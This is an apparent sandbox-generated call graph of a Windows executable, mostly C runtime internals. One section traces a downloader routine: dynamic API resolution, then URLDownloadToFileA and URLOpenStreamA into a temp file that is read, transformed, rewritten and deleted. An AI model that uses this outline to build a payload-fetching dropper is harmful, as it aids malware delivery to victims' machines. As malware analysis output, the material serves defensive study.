___vcrt_freefls@4 20 API calls 8708->8711 8712 1239b03 8709->8712 8713 12364ce ___vcrt_freefls@4 20 API calls 8709->8713 8710->8708 8711->8709 8714 1239b15 8712->8714 8715 12364ce ___vcrt_freefls@4 20 API calls 8712->8715 8713->8712 8714->8706 8716 12364ce ___vcrt_freefls@4 20 API calls 8714->8716 8715->8714 8716->8706 8718 1239f85 8717->8718 8722 1239fa3 8717->8722 8719 1239b67 __cftof 20 API calls 8718->8719 8718->8722 8720 1239f9d 8719->8720 8721 12364ce ___vcrt_freefls@4 20 API calls 8720->8721 8721->8722 8722->8660 8723->8648 8725 1238bda 8724->8725 8726 1238b30 8724->8726 8729 1232550 _ValidateLocalCookies 5 API calls 8725->8729 8734 1239c4b 8726->8734 8730 1238c86 8729->8730 8730->8467 8733 123ae20 43 API calls 8733->8725 8735 1234161 __cftof 38 API calls 8734->8735 8736 1239c6b MultiByteToWideChar 8735->8736 8738 1239ca9 8736->8738 8746 1239d41 8736->8746 8739 1239cca ___scrt_get_show_window_mode 8738->8739 8741 1236508 __onexit 21 API calls 8738->8741 8743 1239d3b 8739->8743 8745 1239d0f MultiByteToWideChar 8739->8745 8740 1232550 _ValidateLocalCookies 5 API calls 8742 1238b91 8740->8742 8741->8739 8748 123ae20 8742->8748 8753 1239d68 8743->8753 8745->8743 8747 1239d2b GetStringTypeW 8745->8747 8746->8740 8747->8743 8749 1234161 __cftof 38 API calls 8748->8749 8750 123ae33 8749->8750 8757 123ac03 8750->8757 8754 1239d85 8753->8754 8755 1239d74 8753->8755 8754->8746 8755->8754 8756 12364ce ___vcrt_freefls@4 20 API calls 8755->8756 8756->8754 8758 123ac1e 8757->8758 8759 123ac44 MultiByteToWideChar 8758->8759 8760 123adf8 8759->8760 8761 123ac6e 8759->8761 8762 1232550 _ValidateLocalCookies 5 API calls 8760->8762 8764 1236508 __onexit 21 API calls 8761->8764 8767 123ac8f 8761->8767 8763 1238bb2 8762->8763 8763->8733 8764->8767 8765 123ad44 8770 1239d68 __freea 20 API calls 8765->8770 8766 123acd8 MultiByteToWideChar 8766->8765 8768 123acf1 8766->8768 8767->8765 8767->8766 8784 1239575 8768->8784 8770->8760 8772 123ad53 8774 1236508 __onexit 21 API calls 8772->8774 8777 123ad74 8772->8777 8773 123ad1b 8773->8765 8775 1239575 11 API calls 8773->8775 8774->8777 8775->8765 8776 123ade9 8779 1239d68 __freea 20 API calls 8776->8779 8777->8776 8778 1239575 11 API calls 8777->8778 8780 123adc8 8778->8780 8779->8765 8780->8776 8781 123add7 WideCharToMultiByte 8780->8781 8781->8776 8782 123ae17 8781->8782 8783 1239d68 __freea 20 API calls 8782->8783 8783->8765 8785 12392a1 _abort 5 API calls 8784->8785 8786 123959c 8785->8786 8789 12395a5 8786->8789 8792 12395fd 8786->8792 8790 1232550 _ValidateLocalCookies 5 API calls 8789->8790 8791 12395f7 8790->8791 8791->8765 8791->8772 8791->8773 8793 12392a1 _abort 5 API calls 8792->8793 8794 1239624 8793->8794 8795 1232550 _ValidateLocalCookies 5 API calls 8794->8795 8796 12395e5 LCMapStringW 8795->8796 8796->8789 8798 12388bd _abort 8797->8798 8805 1239242 RtlEnterCriticalSection 8798->8805 8800 12388c7 8806 123891c 8800->8806 8804 12388e0 _abort 8804->8472 8805->8800 8818 123903c 8806->8818 8808 123896a 8809 123903c 26 API calls 8808->8809 8810 1238986 8809->8810 8811 123903c 26 API calls 8810->8811 8812 12389a4 8811->8812 8813 12388d4 8812->8813 8814 12364ce ___vcrt_freefls@4 20 API calls 8812->8814 8815 12388e8 8813->8815 8814->8813 8832 123928a RtlLeaveCriticalSection 8815->8832 8817 12388f2 8817->8804 8819 123904d 8818->8819 8828 1239049 8818->8828 8820 1239054 8819->8820 8824 1239067 ___scrt_get_show_window_mode 8819->8824 8821 1236fad __dosmaperr 20 API calls 8820->8821 8822 1239059 8821->8822 8823 1236cdb _abort 26 API calls 8822->8823 8823->8828 8825 1239095 8824->8825 8826 123909e 8824->8826 8824->8828 8827 1236fad __dosmaperr 20 API calls 8825->8827 8826->8828 8829 1236fad __dosmaperr 20 API calls 8826->8829 8830 123909a 8827->8830 8828->8808 8829->8830 8831 1236cdb _abort 26 API calls 8830->8831 8831->8828 8832->8817 8834 1234161 __cftof 38 API calls 8833->8834 8835 12390d1 8834->8835 8835->8028 8837 12333d0 ___scrt_get_show_window_mode 8836->8837 8838 1231ed8 LoadLibraryA 8837->8838 8839 1231ef2 8838->8839 8840 123222e 8838->8840 8841 12316a0 50 API calls 8839->8841 8842 1232550 _ValidateLocalCookies 5 API calls 8840->8842 8843 1231f08 8841->8843 8844 123223b 8842->8844 8962 1231260 8843->8962 8844->8035 8847 1231fba LoadLibraryA 8847->8840 8849 1231fcb 8847->8849 8848 1231f35 GetProcAddress 8848->8840 8848->8847 8850 12316a0 50 API calls 8849->8850 8851 1231fe1 8850->8851 8852 1231260 21 API calls 8851->8852 8855 1232010 GetProcAddress 8852->8855 8854 1232094 LoadLibraryA 8854->8840 8856 12320a5 8854->8856 8855->8840 8855->8854 8857 12316a0 50 API calls 8856->8857 8858 12320bb 8857->8858 8859 1231260 21 API calls 8858->8859 8862 12320e7 GetProcAddress 8859->8862 8861 1232174 8863 12316a0 50 API calls 8861->8863 8862->8840 8862->8861 8864 123218a 8863->8864 8865 1231260 21 API calls 8864->8865 8867 12321b6 GetProcAddress 8865->8867 8867->8840 8869 12317a7 ___scrt_get_show_window_mode 8868->8869 8870 12317cd GetTempPathA GetTempFileNameA DeleteFileA 8869->8870 8871 123181a 8870->8871 8872 123182a DeleteUrlCacheEntry URLDownloadToFileA 8871->8872 8873 1231859 CreateFileA 8872->8873 8874 1231a7e 8872->8874 8875 1231896 GetFileSize 8873->8875 8876 1231884 8873->8876 8877 1232550 _ValidateLocalCookies 5 API calls 8874->8877 8879 12318a6 CloseHandle DeleteFileA 8875->8879 8880 12318c9 LocalAlloc 8875->8880 8878 1232550 _ValidateLocalCookies 5 API calls 8876->8878 8881 1231a8b 8877->8881 8882 1231892 8878->8882 8883 1232550 _ValidateLocalCookies 5 API calls 8879->8883 8884 12318db ReadFile 8880->8884 8885 12318f8 CloseHandle 8880->8885 8881->8035 8882->8035 8886 12318c5 8883->8886 8887 12318f1 LocalFree 8884->8887 8888 1231920 CloseHandle 8884->8888 8889 123190d 8885->8889 8886->8035 8887->8885 8891 1231935 8888->8891 8890 1232550 _ValidateLocalCookies 5 API calls 8889->8890 8892 123191c 8890->8892 8893 1231260 21 API calls 8891->8893 8892->8035 8898 1231948 8893->8898 8894 12319f0 CreateFileA 8895 1231a14 LocalFree 8894->8895 8896 1231a2e WriteFile 8894->8896 8899 1232550 _ValidateLocalCookies 5 API calls 8895->8899 8897 1231a44 LocalFree 8896->8897 8905 12319cb LocalFree 8896->8905 8902 1231a53 DeleteFileA 8897->8902 8898->8894 8900 12319c2 8898->8900 8901 1231a2a 8899->8901 8973 12352fd 8900->8973 8901->8035 8904 1232550 _ValidateLocalCookies 5 API calls 8902->8904 8907 1231a6d 8904->8907 8908 1232550 _ValidateLocalCookies 5 API calls 8905->8908 8907->8035 8909 12319ec 8908->8909 8909->8035 8911 12316ad ___scrt_initialize_default_local_stdio_options 8910->8911 8913 12316e3 8911->8913 9036 1234ff9 8911->9036 8913->8045 8915 12333d0 ___scrt_get_show_window_mode 8914->8915 8916 1231ac1 LocalAlloc 8915->8916 8917 1231c08 8916->8917 8920 1231aea ___scrt_get_show_window_mode 8916->8920 8918 1232550 _ValidateLocalCookies 5 API calls 8917->8918 8919 1231c15 8918->8919 8919->8045 9404 1231410 8920->9404 8922 1231b63 8922->8922 8923 1231bde DeleteUrlCacheEntry URLOpenStreamA LocalFree 8922->8923 8923->8917 8925 12333d0 ___scrt_get_show_window_mode 8924->8925 8926 1231c53 CreateFileA 8925->8926 8927 1231cc7 GetFileSize 8926->8927 8928 1231c78 GetLastError 8926->8928 8929 1231cd7 GetLastError 8927->8929 8930 1231d09 LocalAlloc 8927->8930 8931 12316a0 50 API calls 8928->8931 8933 12316a0 50 API calls 8929->8933 8934 1231d81 ReadFile 8930->8934 8935 1231d1f GetLastError 8930->8935 8932 1231c95 8931->8932 8942 1231a90 25 API calls 8932->8942 8938 1231cf4 8933->8938 8936 1231d97 GetLastError 8934->8936 8937 1231e05 CloseHandle DeleteFileA GetTickCount 8934->8937 8939 12316a0 50 API calls 8935->8939 8941 12316a0 50 API calls 8936->8941 9408 1233c78 8937->9408 8946 1231a90 25 API calls 8938->8946 8939->8938 8943 1231db4 8941->8943 8944 1231cb5 8942->8944 8952 1231a90 25 API calls 8943->8952 8948 1232550 _ValidateLocalCookies 5 API calls 8944->8948 8945 1231e8e LocalFree 8947 1232550 _ValidateLocalCookies 5 API calls 8945->8947 8949 1231d5c CloseHandle DeleteFileA 8946->8949 8950 1231eac 8947->8950 8951 1231cc3 8948->8951 8953 1232550 _ValidateLocalCookies 5 API calls 8949->8953 8950->8054 8951->8054 8955 1231dd4 LocalFree CloseHandle DeleteFileA 8952->8955 8956 1231d7d 8953->8956 8954 1231e23 8954->8945 8959 1231a90 25 API calls 8954->8959 8960 1233c57 38 API calls 8954->8960 8957 1232550 _ValidateLocalCookies 5 API calls 8955->8957 8956->8054 8958 1231e01 8957->8958 8958->8054 8961 1231e7d Sleep 8959->8961 8960->8954 8961->8945 8961->8954 8963 123127c 8962->8963 8965 12312c6 ___scrt_get_show_window_mode 8962->8965 8963->8965 8966 1233c4c 8963->8966 8965->8848 8971 1236508 _abort 8966->8971 8967 1236546 8968 1236fad __dosmaperr 20 API calls 8967->8968 8970 1236544 8968->8970 8969 1236531 RtlAllocateHeap 8969->8970 8969->8971 8970->8965 8971->8967 8971->8969 8972 123a2c1 _abort 7 API calls 8971->8972 8972->8971 8974 1235316 8973->8974 8977 1235050 8974->8977 8995 1234e62 8977->8995 8979 123509d 8980 1234161 __cftof 38 API calls 8979->8980 8987 12350a9 8980->8987 8981 1235062 8981->8979 8982 1235077 8981->8982 8994 1235087 8981->8994 8983 1236fad __dosmaperr 20 API calls 8982->8983 8984 123507c 8983->8984 8985 1236cdb _abort 26 API calls 8984->8985 8985->8994 8988 12350d8 8987->8988 9002 12352ca 8987->9002 8991 1235144 8988->8991 9009 1235278 8988->9009 8989 1235278 26 API calls 8992 123520b 8989->8992 8991->8989 8993 1236fad __dosmaperr 20 API calls 8992->8993 8992->8994 8993->8994 8994->8905 8996 1234e67 8995->8996 8997 1234e7a 8995->8997 8998 1236fad __dosmaperr 20 API calls 8996->8998 8997->8981 8999 1234e6c 8998->8999 9000 1236cdb _abort 26 API calls 8999->9000 9001 1234e77 9000->9001 9001->8981 9003 12352d6 9002->9003 9004 12352ec 9002->9004 9003->9004 9005 12352de 9003->9005 9024 12352a0 9004->9024 9015 1238331 9005->9015 9008 12352ea 9008->8987 9010 1235288 9009->9010 9011 123529c 9009->9011 9010->9011 9012 1236fad __dosmaperr 20 API calls 9010->9012 9011->8991 9013 1235291 9012->9013 9014 1236cdb _abort 26 API calls 9013->9014 9014->9011 9016 1234161 __cftof 38 API calls 9015->9016 9017 1238352 9016->9017 9023 123835c 9017->9023 9028 123abca 9017->9028 9020 1232550 _ValidateLocalCookies 5 API calls 9021 12383ff 9020->9021 9021->9008 9022 1239c4b 42 API calls 9022->9023 9023->9020 9025 12352b9 9024->9025 9026 12352ac 9024->9026 9031 123830b 9025->9031 9026->9008 9029 1234161 __cftof 38 API calls 9028->9029 9030 123837c 9029->9030 9030->9022 9032 12369c2 _abort 38 API calls 9031->9032 9033 1238316 9032->9033 9034 1237537 __cftof 38 API calls 9033->9034 9035 1238326 9034->9035 9035->9026 9039 1233d08 9036->9039 9040 1233d30 9039->9040 9041 1233d48 9039->9041 9042 1236fad __dosmaperr 20 API calls 9040->9042 9041->9040 9043 1233d50 9041->9043 9044 1233d35 9042->9044 9045 1234161 __cftof 38 API calls 9043->9045 9046 1236cdb _abort 26 API calls 9044->9046 9047 1233d60 9045->9047 9054 1233d40 9046->9054 9056 123412c 9047->9056 9048 1232550 _ValidateLocalCookies 5 API calls 9050 1233e64 9048->9050 9050->8913 9054->9048 9057 123414b 9056->9057 9058 1236fad __dosmaperr 20 API calls 9057->9058 9059 1233dd8 9058->9059 9060 1234363 9059->9060 9061 1234e62 26 API calls 9060->9061 9064 1234373 9061->9064 9062 1234388 9063 1236fad __dosmaperr 20 API calls 9062->9063 9065 123438d 9063->9065 9064->9062 9066 1233de3 9064->9066 9076 12344bc 9064->9076 9084 1234926 9064->9084 9089 1234566 9064->9089 9094 123458e 9064->9094 9123 12346f7 9064->9123 9067 1236cdb _abort 26 API calls 9065->9067 9073 12341e4 9066->9073 9067->9066 9074 12364ce ___vcrt_freefls@4 20 API calls 9073->9074 9075 12341f4 9074->9075 9075->9054 9145 12344db 9076->9145 9078 12344c1 9079 12344d8 9078->9079 9080 1236fad __dosmaperr 20 API calls 9078->9080 9079->9064 9081 12344ca 9080->9081 9082 1236cdb _abort 26 API calls 9081->9082 9083 12344d5 9082->9083 9083->9064 9085 1234936 9084->9085 9086 123492c 9084->9086 9085->9064 9154 1234307 9086->9154 9090 1234576 9089->9090 9091 123456c 9089->9091 9090->9064 9092 1234307 42 API calls 9091->9092 9093 1234575 9092->9093 9093->9064 9095 1234595 9094->9095 9096 12345af 9094->9096 9097 12345df 9095->9097 9098 123477b 9095->9098 9099 123470f 9095->9099 9096->9097 9100 1236fad __dosmaperr 20 API calls 9096->9100 9097->9064 9103 1234782 9098->9103 9104 12347c1 9098->9104 9114 1234753 9098->9114 9110 123471c 9099->9110 9099->9114 9101 12345cb 9100->9101 9102 1236cdb _abort 26 API calls 9101->9102 9107 12345d6 9102->9107 9105 1234787 9103->9105 9106 123472a 9103->9106 9189 1234dd7 9104->9189 9109 123478c 9105->9109 9105->9114 9120 1234738 9106->9120 9122 123474c 9106->9122 9181 1234a10 9106->9181 9107->9064 9115 1234791 9109->9115 9116 123479f 9109->9116 9110->9106 9113 1234762 9110->9113 9110->9120 9113->9122 9161 1234b6a 9113->9161 9114->9120 9114->9122 9175 1234bfa 9114->9175 9115->9122 9165 1234db8 9115->9165 9169 1234d44 9116->9169 9120->9122 9192 1234ebf 9120->9192 9122->9064 9124 123477b 9123->9124 9125 123470f 9123->9125 9126 1234782 9124->9126 9127 12347c1 9124->9127 9132 1234753 9124->9132 9125->9132 9133 123471c 9125->9133 9128 1234787 9126->9128 9140 123472a 9126->9140 9129 1234dd7 26 API calls 9127->9129 9130 123478c 9128->9130 9128->9132 9143 1234738 9129->9143 9136 1234791 9130->9136 9137 123479f 9130->9137 9131 1234762 9139 1234b6a 40 API calls 9131->9139 9144 123474c 9131->9144 9134 1234bfa 26 API calls 9132->9134 9132->9143 9132->9144 9133->9131 9133->9140 9133->9143 9134->9143 9135 1234a10 48 API calls 9135->9143 9141 1234db8 26 API calls 9136->9141 9136->9144 9138 1234d44 26 API calls 9137->9138 9138->9143 9139->9143 9140->9135 9140->9143 9140->9144 9141->9143 9142 1234ebf 40 API calls 9142->9144 9143->9142 9143->9144 9144->9064 9148 1234505 9145->9148 9147 12344e7 9147->9078 9149 123455b 9148->9149 9150 1234527 9148->9150 9149->9147 9150->9149 9151 1236fad __dosmaperr 20 API calls 9150->9151 9152 1234550 9151->9152 9153 1236cdb _abort 26 API calls 9152->9153 9153->9149 9157 1236fdb 9154->9157 9158 1236ff6 9157->9158 9159 1235050 42 API calls 9158->9159 9160 123432e 9159->9160 9160->9064 9162 1234b82 9161->9162 9163 1234bb7 9162->9163 9198 123723c 9162->9198 9163->9120 9166 1234dc4 9165->9166 9167 1234bfa 26 API calls 9166->9167 9168 1234dd6 9167->9168 9168->9120 9174 1234d59 9169->9174 9170 1236fad __dosmaperr 20 API calls 9171 1234d62 9170->9171 9172 1236cdb _abort 26 API calls 9171->9172 9173 1234d6d 9172->9173 9173->9120 9174->9170 9174->9173 9176 1234c0b 9175->9176 9177 1236fad __dosmaperr 20 API calls 9176->9177 9180 1234c35 9176->9180 9178 1234c2a 9177->9178 9179 1236cdb _abort 26 API calls 9178->9179 9179->9180 9180->9120 9182 1234a26 9181->9182 9220 1233e9c 9182->9220 9184 1234a6d 9230 1237e5c 9184->9230 9188 1234b06 9188->9120 9188->9188 9190 1234bfa 26 API calls 9189->9190 9191 1234dee 9190->9191 9191->9120 9193 1234f31 9192->9193 9194 1234edc 9192->9194 9195 1232550 _ValidateLocalCookies 5 API calls 9193->9195 9194->9193 9196 123723c __cftof 40 API calls 9194->9196 9197 1234f60 9195->9197 9196->9194 9197->9122 9201 123711b 9198->9201 9202 123712f 9201->9202 9203 1237165 9202->9203 9204 1237154 9202->9204 9213 1237133 9202->9213 9205 1234161 __cftof 38 API calls 9203->9205 9206 1236fad __dosmaperr 20 API calls 9204->9206 9207 1237170 9205->9207 9208 1237159 9206->9208 9209 12371da WideCharToMultiByte 9207->9209 9210 123717d 9207->9210 9211 1236cdb _abort 26 API calls 9208->9211 9212 123720a GetLastError 9209->9212 9216 123718b ___scrt_get_show_window_mode 9209->9216 9210->9216 9218 12371c1 ___scrt_get_show_window_mode 9210->9218 9211->9213 9212->9216 9212->9218 9213->9163 9214 1236fad __dosmaperr 20 API calls 9214->9213 9215 1236fad __dosmaperr 20 API calls 9217 123722d 9215->9217 9216->9213 9216->9214 9219 1236cdb _abort 26 API calls 9217->9219 9218->9213 9218->9215 9219->9213 9221 1233ec7 9220->9221 9222 1233eb8 9220->9222 9224 1233ebd 9221->9224 9225 1236508 __onexit 21 API calls 9221->9225 9223 1236fad __dosmaperr 20 API calls 9222->9223 9223->9224 9224->9184 9226 1233eee 9225->9226 9227 1233f05 9226->9227 9262 12341fe 9226->9262 9229 12364ce ___vcrt_freefls@4 20 API calls 9227->9229 9229->9224 9231 1237e82 9230->9231 9232 1237e6c 9230->9232 9234 1237e96 9231->9234 9241 1237eac 9231->9241 9233 1236fad __dosmaperr 20 API calls 9232->9233 9236 1237e71 9233->9236 9235 1236fad __dosmaperr 20 API calls 9234->9235 9237 1237e9b 9235->9237 9238 1236cdb _abort 26 API calls 9236->9238 9239 1236cdb _abort 26 API calls 9237->9239 9240 1234ae7 9238->9240 9239->9240 9240->9188 9255 12342ab 9240->9255 9243 1237f08 9241->9243 9244 1237ee6 9241->9244 9242 1237f26 9246 1237f85 9242->9246 9247 1237f4f 9242->9247 9243->9242 9245 1237f2b 9243->9245 9265 1237d30 9244->9265 9275 123761b 9245->9275 9303 123791e 9246->9303 9249 1237f54 9247->9249 9250 1237f6d 9247->9250 9286 1237c68 9249->9286 9296 1237b04 9250->9296 9387 1236f04 9255->9387 9257 12342d1 9258 1236f04 46 API calls 9257->9258 9261 12342da 9258->9261 9260 12342bd 9260->9257 9391 1236d56 9260->9391 9261->9188 9263 12364ce ___vcrt_freefls@4 20 API calls 9262->9263 9264 123420d 9263->9264 9264->9227 9266 1237d56 9265->9266 9268 1237d6b 9265->9268 9267 1232550 _ValidateLocalCookies 5 API calls 9266->9267 9269 1237d67 9267->9269 9310 1236556 9268->9310 9269->9240 9272 1237e1b 9273 1236ceb _abort 11 API calls 9272->9273 9274 1237e27 9273->9274 9276 123762f 9275->9276 9277 1234161 __cftof 38 API calls 9276->9277 9278 1237641 9277->9278 9279 1237649 9278->9279 9280 123765d 9278->9280 9281 1236fad __dosmaperr 20 API calls 9279->9281 9283 123791e 40 API calls 9280->9283 9285 1237658 __alldvrm ___scrt_get_show_window_mode _strrchr 9280->9285 9282 123764e 9281->9282 9284 1236cdb _abort 26 API calls 9282->9284 9283->9285 9284->9285 9285->9240 9319 123b40e 9286->9319 9290 1237cc8 9291 1237ccf 9290->9291 9292 1237d0d 9290->9292 9294 1237ce7 9290->9294 9291->9240 9373 12379b9 9292->9373 9370 1237b91 9294->9370 9297 123b40e 28 API calls 9296->9297 9298 1237b31 9297->9298 9299 123ae6b 26 API calls 9298->9299 9300 1237b69 9299->9300 9301 1237b70 9300->9301 9302 1237b91 38 API calls 9300->9302 9301->9240 9302->9301 9304 123b40e 28 API calls 9303->9304 9305 1237946 9304->9305 9306 123ae6b 26 API calls 9305->9306 9307 123798b 9306->9307 9308 12379b9 38 API calls 9307->9308 9309 1237992 9307->9309 9308->9309 9309->9240 9311 1236563 9310->9311 9312 1236571 9310->9312 9311->9312 9317 1236588 9311->9317 9313 1236fad __dosmaperr 20 API calls 9312->9313 9314 1236579 9313->9314 9315 1236cdb _abort 26 API calls 9314->9315 9316 1236583 9315->9316 9316->9266 9316->9272 9317->9316 9318 1236fad __dosmaperr 20 API calls 9317->9318 9318->9314 9320 123b443 9319->9320 9325 123b47f 9320->9325 9329 123b4d2 9320->9329 9321 1236556 26 API calls 9322 123c76f 9321->9322 9323 123c79d 9322->9323 9326 123c747 9322->9326 9324 1236ceb _abort 11 API calls 9323->9324 9328 123c7a9 9324->9328 9325->9321 9327 1232550 _ValidateLocalCookies 5 API calls 9326->9327 9330 1237c96 9327->9330 9331 123d460 22 API calls 9329->9331 9361 123ae6b 9330->9361 9332 123b54f 9331->9332 9333 123d570 __floor_pentium4 22 API calls 9332->9333 9334 123b559 9333->9334 9335 123b7c0 9334->9335 9338 123b5de 9334->9338 9343 123b859 9334->9343 9337 123903c 26 API calls 9335->9337 9335->9343 9336 123903c 26 API calls 9339 123b9d7 ___scrt_get_show_window_mode 9336->9339 9337->9343 9340 123903c 26 API calls 9338->9340 9346 123b672 9338->9346 9341 123903c 26 API calls 9339->9341 9340->9346 9342 123b7b8 9341->9342 9358 123bc35 ___scrt_get_show_window_mode 9342->9358 9360 123c098 ___scrt_get_show_window_mode 9342->9360 9343->9336 9343->9339 9344 123903c 26 API calls 9344->9342 9345 123c52f 9347 123af60 26 API calls 9345->9347 9346->9344 9352 123c57b 9347->9352 9348 123c086 9348->9345 9351 123903c 26 API calls 9348->9351 9349 123bfb8 9349->9348 9350 123903c 26 API calls 9349->9350 9350->9348 9351->9345 9353 123903c 26 API calls 9352->9353 9359 123c5e2 9352->9359 9353->9359 9354 123903c 26 API calls 9354->9360 9355 123af60 26 API calls 9355->9359 9356 123903c 26 API calls 9356->9359 9357 123903c 26 API calls 9357->9358 9358->9349 9358->9357 9359->9326 9359->9355 9359->9356 9360->9349 9360->9354 9362 123ae78 9361->9362 9363 123ae8e 9361->9363 9364 1236fad __dosmaperr 20 API calls 9362->9364 9368 123ae87 9362->9368 9363->9362 9367 123aeaa 9363->9367 9365 123ae7d 9364->9365 9366 1236cdb _abort 26 API calls 9365->9366 9366->9368 9369 1236fad __dosmaperr 20 API calls 9367->9369 9368->9290 9369->9365 9371 1234161 __cftof 38 API calls 9370->9371 9372 1237ba7 ___scrt_get_show_window_mode 9371->9372 9372->9291 9374 12379ca 9373->9374 9375 12379d8 9374->9375 9376 12379ef 9374->9376 9378 1236fad __dosmaperr 20 API calls 9375->9378 9377 1234161 __cftof 38 API calls 9376->9377 9382 12379fb 9377->9382 9379 12379dd 9378->9379 9380 1236cdb _abort 26 API calls 9379->9380 9381 12379e7 9380->9381 9381->9291 9383 1236556 26 API calls 9382->9383 9386 1237a79 9383->9386 9384 1236ceb _abort 11 API calls 9385 1237b03 9384->9385 9386->9384 9388 1236f1c 9387->9388 9389 1236f12 9387->9389 9388->9260 9396 1236eea 9389->9396 9392 1236d72 9391->9392 9393 1236d64 9391->9393 9392->9260 9399 1236d1e 9393->9399 9397 1236d83 46 API calls 9396->9397 9398 1236eff 9397->9398 9398->9388 9400 1234161 __cftof 38 API calls 9399->9400 9401 1236d31 9400->9401 9402 12352ca 42 API calls 9401->9402 9403 1236d3f 9402->9403 9403->9260 9405 123142a 9404->9405 9407 1231452 9404->9407 9406 1233c4c 21 API calls 9405->9406 9405->9407 9406->9407 9407->8922 9409 12369c2 _abort 38 API calls 9408->9409 9410 1233c82 9409->9410 9410->8954 10344 123edd5 10346 123edfd 10344->10346 10345 123ee35 10346->10345 10347 123ee27 10346->10347 10348 123ee2e 10346->10348 10349 123eea7 21 API calls 10347->10349 10353 123ee90 10348->10353 10351 123ee2c 10349->10351 10354 123eeb0 10353->10354 10355 123f5f6 __startOneArgErrorHandling 21 API calls 10354->10355 10356 123ee33 10355->10356 9926 1238094 9936 123c8f7 9926->9936 9930 12380a1 9949 123c9d8 9930->9949 9933 12380cb 9934 12364ce ___vcrt_freefls@4 20 API calls 9933->9934 9935 12380d6 9934->9935 9953 123c900 9936->9953 9938 123809c 9939 123c7aa 9938->9939 9940 123c7b6 _abort 9939->9940 9973 1239242 RtlEnterCriticalSection 9940->9973 9942 123c82c 9987 123c841 9942->9987 9944 123c800 RtlDeleteCriticalSection 9947 12364ce ___vcrt_freefls@4 20 API calls 9944->9947 9945 123c838 _abort 9945->9930 9948 123c7c1 9947->9948 9948->9942 9948->9944 9974 123e023 9948->9974 9950 12380b0 RtlDeleteCriticalSection 9949->9950 9951 123c9ee 9949->9951 9950->9930 9950->9933 9951->9950 9952 12364ce ___vcrt_freefls@4 20 API calls 9951->9952 9952->9950 9954 123c90c _abort 9953->9954 9963 1239242 RtlEnterCriticalSection 9954->9963 9956 123c9af 9968 123c9cf 9956->9968 9960 123c91b 9960->9956 9962 123c8b0 66 API calls 9960->9962 9964 12380e0 RtlEnterCriticalSection 9960->9964 9965 123c9a5 9960->9965 9961 123c9bb _abort 9961->9938 9962->9960 9963->9960 9964->9960 9971 12380f4 RtlLeaveCriticalSection 9965->9971 9967 123c9ad 9967->9960 9972 123928a RtlLeaveCriticalSection 9968->9972 9970 123c9d6 9970->9961 9971->9967 9972->9970 9973->9948 9975 123e02f _abort 9974->9975 9976 123e040 9975->9976 9977 123e055 9975->9977 9978 1236fad __dosmaperr 20 API calls 9976->9978 9986 123e050 _abort 9977->9986 9990 12380e0 RtlEnterCriticalSection 9977->9990 9979 123e045 9978->9979 9981 1236cdb _abort 26 API calls 9979->9981 9981->9986 9982 123e071 9991 123dfad 9982->9991 9984 123e07c 10007 123e099 9984->10007 9986->9948 10250 123928a RtlLeaveCriticalSection 9987->10250 9989 123c848 9989->9945 9990->9982 9992 123dfba 9991->9992 9993 123dfcf 9991->9993 9994 1236fad __dosmaperr 20 API calls 9992->9994 9997 123dfca 9993->9997 10010 123c84a 9993->10010 9996 123dfbf 9994->9996 9999 1236cdb _abort 26 API calls 9996->9999 9997->9984 9999->9997 10000 123c9d8 20 API calls 10001 123dfeb 10000->10001 10016 1237fa6 10001->10016 10003 123dff1 10023 123f2a3 10003->10023 10006 12364ce ___vcrt_freefls@4 20 API calls 10006->9997 10249 12380f4 RtlLeaveCriticalSection 10007->10249 10009 123e0a1 10009->9986 10011 123c862 10010->10011 10015 123c85e 10010->10015 10012 1237fa6 26 API calls 10011->10012 10011->10015 10013 123c882 10012->10013 10038 123dc1d 10013->10038 10015->10000 10017 1237fb2 10016->10017 10018 1237fc7 10016->10018 10019 1236fad __dosmaperr 20 API calls 10017->10019 10018->10003 10020 1237fb7 10019->10020 10021 1236cdb _abort 26 API calls 10020->10021 10022 1237fc2 10021->10022 10022->10003 10024 123f2b2 10023->10024 10025 123f2c7 10023->10025 10027 1236f9a __dosmaperr 20 API calls 10024->10027 10026 123f302 10025->10026 10031 123f2ee 10025->10031 10028 1236f9a __dosmaperr 20 API calls 10026->10028 10029 123f2b7 10027->10029 10032 123f307 10028->10032 10030 1236fad __dosmaperr 20 API calls 10029->10030 10035 123dff7 10030->10035 10206 123f27b 10031->10206 10034 1236fad __dosmaperr 20 API calls 10032->10034 10036 123f30f 10034->10036 10035->9997 10035->10006 10037 1236cdb _abort 26 API calls 10036->10037 10037->10035 10039 123dc29 _abort 10038->10039 10040 123dc31 10039->10040 10041 123dc49 10039->10041 10063 1236f9a 10040->10063 10043 123dce7 10041->10043 10047 123dc7e 10041->10047 10045 1236f9a __dosmaperr 20 API calls 10043->10045 10048 123dcec 10045->10048 10046 1236fad __dosmaperr 20 API calls 10057 123dc3e _abort 10046->10057 10066 1239883 RtlEnterCriticalSection 10047->10066 10050 1236fad __dosmaperr 20 API calls 10048->10050 10052 123dcf4 10050->10052 10051 123dc84 10053 123dca0 10051->10053 10054 123dcb5 10051->10054 10055 1236cdb _abort 26 API calls 10052->10055 10056 1236fad __dosmaperr 20 API calls 10053->10056 10067 123dd08 10054->10067 10055->10057 10059 123dca5 10056->10059 10057->10015 10061 1236f9a __dosmaperr 20 API calls 10059->10061 10060 123dcb0 10118 123dcdf 10060->10118 10061->10060 10064 1236a46 __dosmaperr 20 API calls 10063->10064 10065 1236f9f 10064->10065 10065->10046 10066->10051 10068 123dd36 10067->10068 10113 123dd2f 10067->10113 10069 123dd3a 10068->10069 10070 123dd59 10068->10070 10071 1236f9a __dosmaperr 20 API calls 10069->10071 10074 123ddaa 10070->10074 10075 123dd8d 10070->10075 10073 123dd3f 10071->10073 10072 1232550 _ValidateLocalCookies 5 API calls 10076 123df10 10072->10076 10077 1236fad __dosmaperr 20 API calls 10073->10077 10078 123ddc0 10074->10078 10121 123df92 10074->10121 10079 1236f9a __dosmaperr 20 API calls 10075->10079 10076->10060 10080 123dd46 10077->10080 10124 123d8ad 10078->10124 10083 123dd92 10079->10083 10084 1236cdb _abort 26 API calls 10080->10084 10086 1236fad __dosmaperr 20 API calls 10083->10086 10084->10113 10089 123dd9a 10086->10089 10087 123de07 10090 123de61 WriteFile 10087->10090 10091 123de1b 10087->10091 10088 123ddce 10092 123ddd2 10088->10092 10093 123ddf4 10088->10093 10094 1236cdb _abort 26 API calls 10089->10094 10095 123de84 GetLastError 10090->10095 10103 123ddea 10090->10103 10097 123de23 10091->10097 10098 123de51 10091->10098 10102 123dec8 10092->10102 10131 123d840 10092->10131 10136 123d68d GetConsoleCP 10093->10136 10094->10113 10095->10103 10099 123de41 10097->10099 10105 123de28 10097->10105 10162 123d923 